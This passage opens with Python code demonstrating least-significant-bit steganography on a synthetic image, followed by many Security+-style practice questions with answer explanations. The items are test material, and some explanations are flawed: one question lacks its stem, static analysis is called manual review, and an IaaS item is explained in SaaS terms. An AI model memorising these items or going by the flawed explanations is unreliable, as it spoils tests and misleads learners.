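def lsb_embed(cover: bytes, secret: bytes) -> bytes:
    """Overwrite the least significant bit of each cover byte with one payload bit.
    Each pixel value changes by at most 1, which is invisible to the eye."""
    if len(secret) > lsb_capacity(cover):
        raise ValueError(f"cover holds at most {lsb_capacity(cover)} secret bytes")
    payload = len(secret).to_bytes(4, "big") + secret      # length prefix tells the extractor where to stop
    out = bytearray(cover)
    for i, bit in enumerate(_bits(payload)):
        out[i] = (out[i] & 0xFE) | bit
    return bytes(out)


def lsb_extract(stego: bytes) -> bytes:
    """Reassemble the payload from the low bits, reading the length prefix first."""
    def read(start_bit: int, nbytes: int) -> bytes:
        out = bytearray()
        for b in range(nbytes):
            value = 0
            for k in range(8):
                value = (value << 1) | (stego[start_bit + b * 8 + k] & 1)
            out.append(value)
        return bytes(out)
    length = int.from_bytes(read(0, 4), "big")
    return read(32, length)


def max_pixel_change(cover: bytes, stego: bytes) -> int:
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed 8-bit grayscale "image": a smooth gradient, no real file format.
COVER = bytes((i * 7) % 256 for i in range(2048))

if __name__ == "__main__":
    secret = b"meet at the loading dock 0900"
    stego = lsb_embed(COVER, secret)
    print("recovered:", lsb_extract(stego))
    print("largest pixel change:", max_pixel_change(COVER, stego))
```

The same-size output and the one-level pixel change are what make LSB embedding hard to spot by inspection; detection relies on statistical analysis of the low-bit plane, or on hashing known originals (see file integrity monitoring later in this guide), rather than on looking at the picture.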
Differential, full, and incremental refer to which of the following when discussing backup types that will not collect open files? -SAN -Copy -Snapshot -Image
Copy A copy-based backup is a replica of an information technology (IT) system's files, taken at any time to provide a means of recovery. Full, differential, and incremental are the three copy-based strategies, and none of them collects files that are open at the time of the copy. A snapshot, by contrast, freezes the state of a volume so that open files are captured as well.
The client wants to deploy a wireless network that uses a smart card or a certificate that can be installed on the client's PC. Which type of authentication mechanism is most suitable for this task? -EAP-TLS -EAP-TTLS -EAP-FAST -PEAP
EAP-TLS EAP-TLS requires client certificates, but most other types of EAP can be configured to perform mutual authentication (including EAP-TTLS, PEAP with TLS, and EAP-FAST).
An unmanned aerial vehicle is equipped with a component to ensure position and movement sensors are aligned and relays information to a ground control. Which of the following computing devices does this best describe? -SoC -Microprocessor -Embedded system -Microcontroller
Embedded system An embedded system is a combination of hardware and software that contains a dedicated function and uses a computer component to complete the function.
A lack of which of the following measures of disorder can leave a cryptosystem vulnerable and unable to encrypt data securely? -Nonce -Longevity -Entropy -Integrity
Entropy Entropy is a measure of unpredictability. A cryptosystem that draws its keys, nonces, and initialization vectors from a high-entropy source is more secure than one that uses low-entropy sources, whose outputs an attacker can guess; a lack of good entropy leaves the system vulnerable even when the algorithm itself is sound.
A website uses a code generator for access to the site. Once a user enters their username, a one-time 30-second code is generated and provided through a stand-alone app. The user must enter the unique code to gain access. This is an example of which of the following cryptography methods? ECC Ephemeral Entropy Block chain
Ephemeral An ephemeral key or code is one generated for a single use and then discarded; the 30-second one-time code is the ephemeral element here. The app and the authentication server hold the same shared secret and combine it with a time-based counter to produce the code (the TOTP scheme), so the code changes every 30 seconds and cannot be replayed. Strictly, that shared secret is symmetric; an asymmetric ephemeral key pair is the ephemeral element in key-establishment protocols such as ECDHE, not in one-time codes.
Which of the following protocols would secure file transfer services for an internal network? -FTPES -SSTP -LDAPS -DNSSEC
FTPES File Transfer Protocol Explicit Secure (FTPES) uses the AUTH TLS command to upgrade an unsecure connection established over port 21 to a TLS-protected one, so authentication credentials and file data are not sent in the clear. SSTP is a VPN protocol, LDAPS secures directory queries, and DNSSEC signs DNS records; none of them secures file transfer.
A hacker modified a company photo by embedding malicious code in the picture. The hacker emailed the picture to company employees, and several employees opened the email. The hacker now has remote access to those employees' computers. Which of the following can prevent this method of attack? -Protocol analyzer -Steganography -File integrity monitoring -File encryption
File integrity monitoring File integrity monitoring is a feature available in most antivirus software or HIPS (Host-based Intrusion Prevention System). HIPS can capture a baseline of the image using hashing algorithms; any radical change to the file will flag the incident and quarantine the file.
A penetration consultant has been tasked to test a company's wireless network on the fifth floor of a commercial building. The consultant is given no privileged information about the network, essentially working in a black box environment. What would the consultant most likely do first to begin the test? -Operate a C2 network. -Set rules of engagement. -Gain privileged access. -Footprint the environment.
Footprint the environment. Footprinting is a topology discovery technique that scans for hosts, IP ranges, and routes between networks to map out the structure of the target network. A WiFi scanner can be used to reveal access points (APs) in the area.
A Department of Defense (DoD) application is migrating to the cloud using Amazon Web Services (AWS) as the cloud service provider. As part of the service level agreement (SLA) and DoD mandate, the application must remain within the United States of America. AWS offers the application East (Boston) and West (Oregon) data centers for operations and failover. Which of the following is AWS providing in accordance with the SLA and DoD mandate? -Regulatory framework -Vendor diversity -Continuity of operations -Geographical considerations
Geographical considerations Amazon Web Services (AWS) is taking into account geographical considerations. The agreement mandates the system will stay within the United States.
An application requires continuity of operations within a 24 hour period due to the command and control capabilities it maintains. The failover site must be physically separated from the program office and be available within the required timeframe with live data. Which of the following redundancy solutions best meets the failover requirement? -Failover clusters -Recovery time objective -Meantime between failure -Geographical dispersal
Geographical dispersal Geographical dispersal is a failover consideration that replicates data in hot and warm sites physically distanced from one another in the event of a catastrophe.
Using Unified Extensible Firmware Interface (UEFI) to boot a server, the system must also provide secure boot capabilities. Part of the secure boot process requires a secure boot platform key or self-signed certificate. Determine which of the following an engineer can use to generate keys within the server using an available Peripheral Component Interconnect Express (PCIe) slot. -Hardware security module -NFC token -Trusted platform module -Password vault
Hardware security module A hardware security module (HSM) is an appliance designed to perform centralized public key infrastructure (PKI) management, key generation, or key escrow for devices. HSM can also be implemented as a plug-in PCIe adapter card to operate within a device.
A military organization is evaluating its disaster recovery plan (DRP) to assess risk and in particular identify any single points of failure. Suggest an initial action for the organization's evaluation. -Create a heat map -Assess site risk -Renew cybersecurity insurance -Identify critical systems and mission essential functions
Identify critical systems and mission essential functions Identifying critical systems and mission essential functions is often the first step of the risk management process, and will reveal any potential single points of failure.
The financial staff at an organization works with IT and management to determine the risks associated with currently deployed systems. What measure of risk results from this analysis? -Residual risk -Inherent risk -Control risk -Risk appetite
Inherent risk The result of quantitative or qualitative analysis is a measure of inherent risk. Inherent risk is the level of risk before any type of mitigation has been attempted.
A company provides smartphones to their employees. IT administrators have the ability to deploy, secure, and remove specific applications and data from the employees' smartphones. Analyze the selections and determine how IT can perform this type of control. -Content management -Storage segmentation -Push notifications -Baseband update
Storage segmentation Storage segmentation is personal data segmented from organizational data on a mobile device. It gives IT administrators control over corporate assets on employees' mobile devices.
A security administrator protects systems' passwords by hashing their related keys. The administrator discovers that this approach does not make the key any more difficult to crack. Analyze the different security properties and determine which one the administrator implemented. -Key exchange -Key stretching -Digital signatures -Key length
Key stretching Key stretching takes a key that is generated from a user password and repeatedly converts it to a longer and more random key. This does not make the key stronger but causes a hacker to spend more time using a reverse hashing algorithm.
When implementing a native-cloud firewall, which layer of the Open Systems Interconnection (OSI) model will require the most processing capacity to filter traffic based on content? -Layer 4 -Layer 7 -Layer 3 -Layer 1
Layer 7 At layer 7, or the application layer of the OSI model, the firewall can parse application protocol headers and payloads (such as HTTP packets) and make filtering decisions based on their contents. This requires the most processing capacity (or load balancing), or the firewall will become a bottleneck causing network latency. At layer 4, or the transport layer, the firewall will store connection states and use rules to allow established or related traffic. At layer 3, or the network layer, the firewall accepts or denies connections on the basis of IP addresses or address ranges and TCP/UDP port numbers. Layer 1 of the OSI model is the physical layer. Firewall solutions like a packet-filtering firewall start operating at layer 3.
The ARP cache stores what kind of information about recent connections? -Latency and packet loss stats -MAC addresses -Round trip time (RTT) of network hops -Packet data
MAC addresses The ARP cache displays the MAC address of the interface corresponding with each IP address recently communicated with by the local host. This can be useful for identifying Man-in-the-Middle or other spoofing attacks.
An insider threat gained access to a server room and proceeded with connecting a laptop to the network. The laptop was configured with a spoofed network interface card (NIC) address to remain undetected by the network intrusion detection (IDS) systems. What layer 2 attack can the insider threat perform to disrupt the network? -MAC flooding -OT DDoS attack -Domain hijacking -DNS poisoning
MAC flooding Media Access Control (MAC) flooding is a layer 2 network attack. It exhausts the memory used to store a MAC address table on a switch, which results in flooding unicast traffic out of all ports and disrupting all connecting devices and network services.
Two organizations plan on forming a partnership to provide systems security services. Part of the onboarding requirements for both sides includes a mutual understanding of quality management processes. Which approach details this requirement? -Non-disclosure agreement (NDA) -Business partnership agreement (BPA) -Service level agreement (SLA) -Measurement systems analysis (MSA)
Measurement systems analysis (MSA) Measurement systems analysis (MSA) relates to quality management processes, such as Six Sigma, that make use of quantified analysis methods to determine the effectiveness of a system and may be part of an onboarding requirement.
A security firm and an organization meet and agree to begin a business relationship. While a contract is not in place yet, what do the parties use to maintain confidentiality and as an intent to work together? -Measurement systems analysis (MSA) -Business partnership agreement (BPA) -Memorandum of understanding (MOU) -Service level agreement (SLA)
Memorandum of understanding (MOU) A memorandum of understanding (MOU) is a preliminary or exploratory agreement to express an intent to work together. MOUs are usually intended to be relatively informal and not to act as binding contracts.
A multinational company has partnered with several smaller, younger companies. To protect their supply chain and improve their own risk posture, the company offers to provide network security services for their new partners. Conclude what type of risk the company is addressing. -External -Legacy systems -Multiparty -Internal
Multiparty Multiparty risk occurs when an adverse event impacts multiple organizations. If a breach occurs for one party, all parties share the risk.
Systems administrators rely on ACLs to determine access to sensitive network data. What control type do the administrators implement? -Corrective -Detective -Deterrent -Preventative
Preventative Preventative controls act to eliminate or reduce the likelihood that an attack can succeed. A preventative control operates before an attack can take place. An ACL is an example of this control type.
What protocol alters public IP addresses to private IP addresses and vice versa, in an attempt to protect internal computers from the Internet? -NAT -URL Filter -Firewall -Proxy
NAT Network Address Translation (NAT) translates public IP addresses to private and vice versa. By using the NAT protocol on the firewall, a company can hide assets from the public internet.
Determine a solution that can combine with a cloud access security broker (CASB) to provide a wholly cloud-hosted platform for client access? -Geo-redundant storage -On-demand machine resources -Virtual private cloud endpoint -Next-generation secure web gateway
Next-generation secure web gateway An on-premises next-generation secure web gateway (SWG) is a proxy-based firewall, content filter, and intrusion detection/prevention system that mediates user access to Internet sites and services. Netskope is an example of an SWG product that can include a cloud access security broker (CASB).
A European company that offers subscription services has recently experienced a data breach wherein private data, including personally identifiable information (PII), was compromised. What step should be taken by the company to avoid regulatory fines or lawsuits? -Identify the vulnerability that led to the breach. -Fix the vulnerability that led to the breach. -Notify those affected by the breach. -Hide the occurrence of the breach.
Notify those affected by the breach. Many laws and regulations require immediate notification of all third parties affected by a breach, including the GDPR in the EU. Failing to do so could lead to fines and potential reputation damage.
There are several ways to check on the status of an online certificate, but some introduce privacy concerns. Consider how each of the following is structured and select the option with the best ability to hide the identity of the certificate requestor. -CRL -OCSP stapling -OCSP -OCSP responder
OCSP stapling Stapling addresses the privacy issues surrounding Online Certificate Status Protocol (OCSP) by having the SSL/TLS web server periodically obtain a time-stamped response from the Certificate Authority. Then, when a client submits an OCSP request, the web server returns the time-stamped response.
An aviation tracking system maintains flight records for equipment and personnel. The system is a critical command and control system that must maintain an availability rate of 99% for key parameter performance. The cloud service provider (CSP) guarantees a failover to multiple zones if an outage occurs. In addition to the multi-zonal cloud failover, what other backup solution could the system invest in order to maintain data locally? -Offline -Sandboxing -Control diversity -Vendor diversity
Offline An offline backup solution would be a good implementation to safeguard the system's data and have it readily available to access in the event of an outage.
A file system audit shows a malicious account was able to obtain a password database. The malicious account will be able to use the information without interacting with an authentication system. What type of attack will the malicious account be able to perform on systems? -Dictionary attack -Password spraying attack -Offline password attack -Online password attack
Offline password attack An offline password attack means that the attacker has managed to obtain a database of password hashes from an Active Directory credential store, for example. A password cracker tool does not need to interact with the authentication system in this case.
Customers receive a seemingly genuine email from their trusted bank, informing them that their password needs updating. However, when authenticating, an attacker captures the customers' credentials. What kind of attack did the bank customers experience? -Whaling -SMiShing -Phishing -Vishing
Phishing Phishing is a combination of social engineering and spoofing, where the attacker sets up a spoof website to imitate a trusted one. The attacker then emails users of the genuine website, informing them that their account must be updated, supplying a disguised link that leads to their spoofed site. When users authenticate with the spoofed site, their logon credentials are captured.
-Hacktivists -Script kiddies -Criminal syndicates -State actors
State actors State actors have been implicated in many attacks, particularly on energy and health network systems. They typically work at arm's length from the national government that sponsors and protects them, maintaining "plausible deniability."
Evaluate the following properties and determine which set relates to Domain Name System Security Extension (DNSSEC). -RRset, Signing key -Master key, Transport protocol -Community name, Agent -Public key, Private key
RRset, Signing key DNS Security Extensions (DNSSEC) help to mitigate spoofing and poisoning attacks. When enabled, a "package" of resource records (called an RRset) is signed with a private key (the Zone Signing Key).
A brute-force attack compromises a server in a company's data center. Security experts investigate the attack type and discover which vulnerability on the server? -Open ports and services -Unsecure protocols -Weak encryption -Default settings
Weak encryption Weak encryption vulnerabilities allow unauthorized access to data. An algorithm used for encryption may have known weaknesses that allow brute-force enumeration.
A system administrator applies a Windows patch to the virtual machines (VM) in a virtual desktop infrastructure (VDI). After the patch is complete, the VMs no longer authenticate with the server. Which of the following is the best next step to take for the system administrator? -Execute penetration test. -Complete a vulnerability scan. -Take a snapshot. -Revert to last known good configuration.
Revert to last known good configuration. The administrator should revert to the last known good configuration before the patch. The virtual machines (VM) were working before the patch. Reverting to the last known good configuration will get the system back up and running.
Recommend an immediate response that does not require generating new certificates in a scenario where an attacker has compromised a host on a network by spoofing digital certificates. -Install a content filter -Revoke the host's certificate -Remove all root certificates from host -Install a data loss prevention system
Revoke the host's certificate Certificate revocation must always be performed if the associated host is compromised. The Key Compromise property of the certificate can allow it to be rekeyed to retain the same subject and expiry information.
A global corporation assesses risk appetite and how risks in various regions could influence mission-critical operations. They are assessing compliance with local laws and licensing requirements to prevent financial risk or resolve security risks, and changing the risk posture and implementing risk controls to compensate. Conclude what type of assessment the team is performing. -Risk control assessment -Site risk assessment -Penetration testing -Vulnerability assessment
Risk control assessment Risk and control self-assessment (RCSA) is the method by which companies evaluate and analyze the operational risks and the efficacy of the controls used to manage them.
Analyze the methods and determine which a technician uses as a non-persistent recovery method on a server using a system baseline. -Build from a template -Live boot media -Revert to known state -Rollback to known configuration
Rollback to known configuration Rollback to known configuration is a mechanism for restoring a baseline system configuration, such as Windows System Restore.
An electrical cooperative startup needs the ability to monitor energy use, collect data taken from the monitoring, and use the data to lower costs and energy waste. Which component of an industrial control system (ICS) would be the best solution for the cooperative? -MSP -RTOS -SCADA -TACACS+
SCADA Supervisory control and data acquisition (SCADA) is part of an industrial control system (ICS) and is used for gathering and analyzing real-time data. SCADA aids industry in making data-driven decisions based on reporting and analytics.
A network uses a framework for management and monitoring that uses the Data Encryption Standard (DES) and the Advanced Encryption Standard (AES), which encrypts the contents of traps and query responses. Analyze the types of protocols available for management and monitoring, then deduce the protocol utilized. -SNMPv2c -SNMPv1 -MIB -SNMPv3
SNMPv3 Simple Network Management Protocol (SNMP) v3 supports encryption and strong user-based authentication. Instead of community names, the agent is configured with a list of usernames and access permissions.
An IT technician at a London-based company is setting up a new VoIP system in the CEO's office. The CEO has asked the technician to set up encryption for calls, and the technician informs the CEO that session-to-session encryption is implemented at the endpoints. The CEO wants not only the session encrypted but also the call data itself. Recommend a protocol that will encrypt VoIP call data. -SFTP -HTTPS -SRTP -SIPS
SRTP SRTP, which stands for Secure Real-time Transport Protocol, provides encryption and authentication for RTP (Real-time Transport Protocol) data in unicast and multicast data flows. SRTP will encrypt all data sent and received by each SIP endpoint for the entire journey.
The virtual teleconference room has a Session Initiation Protocol (SIP) endpoint for communication with remote branch offices. Company policy requires the VTC components to secure both the session and the call data before others can use it. Which of the following protocols will provide encryption for the call data? -SRTP -ESP -SIPS -HTTPS
SRTP Secure Real-time Transport Protocol (SRTP) is an encryption protocol that provides confidentiality for the actual call data.
Finance representatives at an organization meet professional standards by providing reports that are highly detailed and designed to be restricted. As members of the American Institute of Certified Public Accountants (AICPA), which standards do the finance representatives follow? -SSAE SOC 2 Type III -International Organization for Standardization (ISO) 31000 -International Organization for Standardization (ISO) 27K -SSAE SOC 2 Type II
SSAE SOC 2 Type II A Service Organization Control (SOC2) Type II report assesses the ongoing effectiveness of the security architecture over a period of 6-12 months. SOC2 reports are highly detailed and designed to be restricted.
Cuckoo is a software package that provides a system configuration allowing the system to be completely isolated from its host. It provides a safe environment for potentially dangerous research, such as on malware, while recording file system and registry changes, as well as network activity. What is this type of isolated system called? -Vulnerability test -ARP cache -Sandbox -Exploitation framework
Sandbox A sandbox, such as Cuckoo, is an isolated environment created to safely analyze malware and exploits. Sandboxing is an isolation technique commonly used in cybersecurity research, particularly malware research.
Which of the following practices would help mitigate the oversight of applying coding techniques that will secure the code of an internal application for a company? -Input validation -Dead code removal -Static code analysis -Normalization
Static code analysis Static code analysis is the manual review of code to identify oversights, mistaken assumptions, or a lack of knowledge or experience. This may ensure security or improve the code depending on who is peer-reviewing it.
Which aspect of certificate and key management should an administrator consider when trying to mitigate or prevent the loss of private keys? -Revocation -Storage -OCSP -Expiration
Storage Private keys or certificates must be securely stored to prevent unauthorized use and loss. The certificate authority that creates the key pair must provide strict access control to the database and maybe even data-at-rest encryption.
A cellular company updates cell towers across the country. They plan to update the baseband of their mobile users, to fully support the new towers. How may the company effectively deploy this new update? -Send updates over Wi-Fi -Via USB -Add to next Android version -Send updates through OTA
Send updates through OTA OTA (over the air) refers to the process of updating basebands on mobile devices through the cellular network. This option is more effective and efficient and requires very little interaction by the user.
How might responsibilities be divided among individuals to prevent abuse of power in an organization? -Separation of duties -Clean desk space -Job rotation -Least privilege
Separation of duties Separation of duties is a means of establishing checks and balances against the possibility that critical systems or procedures can be compromised by insider threats. Divided duties among individuals prevent ethical conflicts or abuses of power.
A developer uses a prepackaged set of tools that includes documentation, application programming interfaces (APIs), code samples, and libraries to easily integrate an application with the company Linux operating system. Which secure coding process is the developer using? -Software development kit (SDK) -Code reuse -APIs -Stored procedure
Software development kit (SDK) A software development kit (SDK) provides developers a prepackaged set of tools, libraries, documentation, and code samples to create software applications on a specific platform.
A recent attack on a major retail chain reported that customers' private information, including credit card information, was stolen. The report explained that a heating, ventilation, and air conditioning (HVAC) contractor copied the information to an external hard drive while servicing an air conditioner unit, and later uploaded the data to a cloud storage resource. A security engineer would classify this type of attack as which of the following? -Cloud-based attack -Birthday attack -USB cable attack -Supply chain attack
Supply chain attack A supply chain attack involves a threat actor seeking methods to infiltrate a company in its supply chain. A heating, ventilation, and air conditioning (HVAC) supplier is one example of using a maintenance service to gain access to sensitive areas like a datacenter.
An organization wants to implement a certificate on a website domain. The organization prepares for a rigorous check to prove its identity using extended validation. Evaluate the options and conclude why the certificate would not be issued. -A TXT record is used for verification. -Multiple root CAs are trusted. -The domain uses a wildcard. -The root CA is offline.
The domain uses a wildcard. Extended Validation (EV) is a proof of ownership process that requires rigorous checks on the subject's legal identity and control over a domain. An EV certificate cannot be issued for a wildcard domain.
A company is looking into integrating on-premise services and cloud services with a cloud service provider (CSP) using an Infrastructure as a Service (IaaS) plan. As a cloud architect works on architectural design, which of the following statements would NOT apply in this case? -The provider is responsible for the availability of the software. -The provider must update the firmware and security patches of physical servers. -The company must establish separation of duties mechanisms. -The company is liable for legal and regulatory requirements for customer data.
The provider is responsible for the availability of the software. In a Software as a Service (SaaS) plan, the provider is responsible for the availability of the software. The software may include an appliance with Windows Server 2016 already installed and available to use.
Flow analysis tools, such as IPFIX or NetFlow, collect metadata about network traffic without capturing each frame. Evaluate the type of analysis that uses these tools. -Packet analysis -Log analysis -Trend analysis -Vulnerability analysis
Trend analysis Since flow analyzers gather metadata and statistics about network traffic, they are commonly used to visualize traffic statistics in order to assist in identifying trends.
A company with offices in multiple countries deployed a cyber threat intelligence (CTI) appliance in the cloud to detect network attacks. The security team examined last week's data and spent a significant amount of time trying to better predict future attacks and ways to improve security. How can the team take advantage of cloud resources to better analyze these threats? -Use OSINT -Use proprietary software -Use code repositories -Use artificial intelligence
Use artificial intelligence Artificial intelligence (AI), especially machine learning, is available with cloud service providers (CSP) such as the Google Cloud Platform. AI can help analyze threat data in real-time to make better predictions, and initiate workflows to stop attacks as they happen.
A hacker can use Microsoft Office applications as an attack vector to automatically run multiple tasks in the background using which of the following? -PowerShell -Bash -VBA -ARP poisoning
VBA Microsoft Office uses the Visual Basic for Applications (VBA) language to script macros, for example, in a Word document to carry out multiple tasks automatically.
